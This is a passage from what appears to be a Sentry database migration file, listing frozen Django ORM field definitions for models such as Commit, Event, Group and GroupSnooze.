'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'object_name': 'Counter', 'db_table': "'sentry_projectcounter'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.deletedorganization': {
'Meta': {'object_name': 'DeletedOrganization'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'object_name': 'DeletedProject'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'object_name': 'DeletedTeam'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'object_name': 'Deploy'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.dsymapp': {
'Meta': {'unique_together': "(('project', 'platform', 'app_id'),)", 'object_name': 'DSymApp'},
'app_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'sync_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'})
},
'sentry.email': {
'Meta': {'object_name': 'Email'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.environment': {
'Meta': {'unique_together': "(('project_id', 'name'), ('organization_id', 'name'))", 'object_name': 'Environment'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'object_name': 'FileBlob'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "[('group_id', 'environment_id')]", 'object_name': 'GroupEnvironment', 'index_together': "[('environment_id', 'first_release_id')]"},
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'first_release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'object_name': 'GroupRedirect'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'object_name': 'GroupResolution'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'object_name': 'GroupShare'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'default': "'13d0e9633db64057bfa89592c15f547f'", 'unique': 'True', 'max_length': '32'})
},
'sentry.groupsnooze': {
'Meta': {'object_name': 'GroupSnooze'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
